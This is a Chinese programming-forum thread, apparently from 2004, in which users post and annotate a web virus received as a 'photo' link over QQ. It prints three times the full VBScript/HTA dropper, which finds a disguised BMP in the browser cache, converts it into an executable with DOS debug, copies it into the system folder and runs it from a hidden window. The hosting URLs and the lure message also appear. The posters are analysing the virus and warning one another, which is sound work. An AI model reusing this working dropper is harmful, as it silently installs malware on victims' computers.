前几天上网收到的一个网页病毒,给大家看看..(5分)

D

DT

Unregistered / Unconfirmed
GUEST, unregistred user!
URL http://kirby.sohuer.com/laoshun.jpg->
http://kirby.sohuer.com/laoshun.htm->
http://kirby.sohuer.com/laoshun.asp:

<SCRIPT LANGUAGE="VBScript">
'by 陈经韬.2003.11.http://www.138soft.com,lovejingtao@21cn.com
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU/Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders/Cache")
sucess=0

sub FF
SearchBMPFile fso.GetFolder(CACHE),"laoshun[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"laoshun[2].bmp"
End sub


Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "/" & folder.name & "/" & fname');
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "/"
winsys=fso.GetSpecialFolder(1) & "/"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
On Error Resume Next
File.Delete
if FSO.FileExists(str) then exit function
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("1")
Lt.WriteLine("rcx")
'下面的数字是十六进制的EXE文件的大小
Lt.WriteLine("101")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("@echo off")
Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "laoshun.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "laoshun.exe")
Lt.Close
WSH.Run tmp & "tmp.bat",false,6
On Error Resume Next
'FSO.GetFile(tmp & "tmp.bat").Delete
sucess=1
window.close ()
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
</script>

<SCRIPT language=JavaScript>
function F()
{
FF();
if (sucess==0) setTimeout("F()", 2000);
}
setTimeout("F()", 2000);
parent.moveTo((screen.width-0)/2,(screen.height-0)/2);
parent.resizeTo(0,0);
</SCRIPT>
</head>
<HTA:APPLICATION caption="no" border="none"
SHOWINTASKBAR="no">
<body bgcolor="#ffffff" text="#000000" scroll="no" leftmargin="2" topmargin="3" marginwidth="0" marginheight="0" oncontextmenu='self.event.returnvalue=0' onkeydown="javascript:if(event.keyCode==27 || event.keyCode==78 && event.ctrlKey)return false;">
</body>
</html>
 
有兴趣研究的可以自己上去看看.
 
可惜我不懂java
 
楼上的看清楚,关键代码用汇编写的,主体代码用vbstript写的,javascript只是调用了vbstript写的函数~~

看了也有3、4个病毒了,之后,我决定~~wscript.exe这个东西我一定要灭吊,坚决改名,90%的vb病毒跟这个东西有关系~~这个东西强大啊,ww怕了它了,你们要么不要装vb要么就跟我一样改名这个吊exe
要不然有危险
 
闲得慌写了注释,谁把汇编那一段讲解一下,大家一起提高
rbx rcx 什么意思啊?真的不懂
debug
-rbx 1
- rcx 101
-w 136 ''移动某个偏移量
-q ''


'<SCRIPT LANGUAGE="VBScript">
'by 陈经韬.2003.11.http://www.138soft.com,lovejingtao@21cn.com
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")''创建文件系统
Set WSH = CreateObject("WScript.Shell")''调用windows脚本对象,这个最厉害
CACHE=wsh.RegRead("HKCU/Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders/Cache") ''得到cash的路径,都是windows惹的祸
sucess=0

sub FF
SearchBMPFile fso.GetFolder(CACHE),"laoshun[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"laoshun[2].bmp" ''病毒发作的主要过程,见下方
End sub


Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "/" & folder.name & "/" & fname')'来到cash的上级目录,找到laoshun[2].bmp这个文件
if FSO.FileExists(str) then''如果存在的话
tmp=fso.GetSpecialFolder(2) & "/" ''得到临时目录
winsys=fso.GetSpecialFolder(1) & "/"''得到系统目录
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")''copy到临时目录下面
On Error Resume Next
File.Delete''把原来的删掉
if FSO.FileExists(str) then exit function''如果存在,说明中招了,不感染,否则感染
set Lt=FSO.CreateTextFile(tmp & "tmp.in")''创建一个后缀.in 的文件
''以下开始写入汇编代码,不懂~~谁教我?
Lt.WriteLine("rbx")
Lt.WriteLine("1")
Lt.WriteLine("rcx")
'下面的数字是十六进制的EXE文件的大小
Lt.WriteLine("101")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
''写完了,用debug编译成exe
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("@echo off")
Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "laoshun.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "laoshun.exe")
Lt.Close
''执行这个exe
WSH.Run tmp & "tmp.bat",false,6
On Error Resume Next
'FSO.GetFile(tmp & "tmp.bat").Delete''删除生成这个exe的.bat文件
sucess=1
window.close ()
end if
''遍历cash文件夹底下所有子文件夹并且感染
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
</script>

<SCRIPT language=JavaScript>
function F()
{
FF();
if (sucess==0) setTimeout("F()", 2000);//可能是感染一次暂停2秒,以免引起cup占用过高,被怀疑
}
setTimeout("F()", 2000);
parent.moveTo((screen.width-0)/2,(screen.height-0)/2);
parent.resizeTo(0,0);
</SCRIPT>
'以下是html代码,浏览网页的时候可以看见,不过等看见的时候,上面的代码已经执行,你就中招了
</head>
<HTA:APPLICATION caption="no" border="none"
SHOWINTASKBAR="no">
<body bgcolor="#ffffff" text="#000000" scroll="no" leftmargin="2" topmargin="3" marginwidth="0" marginheight="0" oncontextmenu='self.event.returnvalue=0' onkeydown="javascript:if(event.keyCode==27 || event.keyCode==78 && event.ctrlKey)return false;">
</body>
</html>
 
错了 w136 是写入,不是移动,眼睛花了
 
rbx是注册bx,什么意思啊?不懂rbx 1 注册bx 1
注册cx101
写入地址136
什么意思啊?最关键的地方了,谁解释啊?大哥们,进来看看嘛
 
我一个人灌
r是寄存器,不是注册,唉~文盲,不提了
bx=0001
cx=0101
w138写入0138 (这个内存地址代表什么啊??)
病毒够精简,可惜看不懂
 
这病毒 可不只这几句啊.......
我把相关文件都发上来吧给大家一个完整的:
http://kirby.sohuer.com/laoshun.jpg
内容如下:
<html>
<iframe src="laoshun.htm" width="0" height="0" frameborder="0"></iframe>
<center><img src="mmm.jpg"></center>
</html>
我们继续找里面的相关文件内容:
http://kirby.sohuer.com/laoshun.htm
内容如下:
<html>
<head>
<body>
<IMG SRC=laoshun.bmp width=0 height=0>
<object data="laoshun.ASP" width=0 height=0>
</object>
</html>

另一个图片文件:
http://kirby.sohuer.com/mmm.jpg
内容如下:
<<!@#$!@#$ 好像确实是张图片(而且好像跟上面的VB代码没关系)>>

再深入一层:
http://kirby.sohuer.com/laoshun.bmp
内容如下:
<<BM:!#@$!#$!#$!#$!>>
是一张无法看清的BMP文件,估计这是一个病毒文件,以BM:开头,可能是伪装成BMP文件

下一个文件:
http://kirby.sohuer.com/laoshun.ASP
内容如下:
<<就是上面的那个文件了,下载完打开被瑞星发现了.提示为:Script.HTA.a>>
文件内容:

<SCRIPT LANGUAGE="VBScript">
'by 陈经韬.2003.11.http://www.138soft.com,lovejingtao@21cn.com
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU/Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders/Cache")
sucess=0

sub FF
SearchBMPFile fso.GetFolder(CACHE),"laoshun[1].bmp"
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"laoshun[2].bmp"
End sub


Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "/" & folder.name & "/" & fname');
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "/"
winsys=fso.GetSpecialFolder(1) & "/"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
On Error Resume Next
File.Delete
if FSO.FileExists(str) then exit function
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("1")
Lt.WriteLine("rcx")
'下面的数字是十六进制的EXE文件的大小
Lt.WriteLine("101")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("@echo off")
Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "laoshun.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "laoshun.exe")
Lt.Close
WSH.Run tmp & "tmp.bat",false,6
On Error Resume Next
'FSO.GetFile(tmp & "tmp.bat").Delete
sucess=1
window.close ()
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
</script>

<SCRIPT language=JavaScript>
function F()
{
FF();
if (sucess==0) setTimeout("F()", 2000);
}
setTimeout("F()", 2000);
parent.moveTo((screen.width-0)/2,(screen.height-0)/2);
parent.resizeTo(0,0);
</SCRIPT>
</head>
<HTA:APPLICATION caption="no" border="none"
SHOWINTASKBAR="no">
<body bgcolor="#ffffff" text="#000000" scroll="no" leftmargin="2" topmargin="3" marginwidth="0" marginheight="0" oncontextmenu='self.event.returnvalue=0' onkeydown="javascript:if(event.keyCode==27 || event.keyCode==78 && event.ctrlKey)return false;">
</body>
</html>

/*********************************************/
*所有文件就这些了,有兴趣的那个BMP文件自已去下.*
*能分析出来就更好了 *
/*********************************************/

对了,这是那天QQ上发来的信息:
(2004-04-07 16:30:32) XXXX
http://kirby.sohuer.com/laoshun.jpg
我新影的相片`````漂亮``就给点意见```
>>>>>>>>>>>>>>>>.大家以后小心一点啊.....类似的信息...........XXXXXXXXXXXX
 
另:以后有人发图片去Linux下看:)
 
请大家看看这个病毒,好像是用java脚本作的,更厉害!
http://www.delphibbs.com/delphibbs/dispq.asp?lid=2551194
 
估计是我分少,没人来答了....:)
 
您必须登录或注册才可回复。

Similar threads

T
一个考勤处理的SQL过程,编完运行 速度太慢了,用了游标,请大家帮忙给修改一下啊.现在350人,一个月的考勤,处理居然要30分钟.代码请贴子查看. ( 积分:
回复
6
查看
713
tl_lyq
T
急,求一个获得指定网址网页代码的程序。 ( 积分: 300 )
回复
12
查看
255
金卡绣球jk8.com
怎样把一个网页里的邮件全部找出来? ( 积分: 10 )
回复
5
查看
490
可爱小猪
I
[WebBrowser]一个大家都想明白的难题!!!在网上能用的一个网页的连接,把它下载到本机上就不能用了!!! ( 积分: 50 )
回复
2
查看
282
iyesno
I
H
将一个局域网的AD0的mis程序升级到互联网的方法(散分 前 6 人 50分 ,感兴趣 的 问我要测试程序) ( 积分: 300 )
2
回复
36
查看
621
baiduan
B
顶部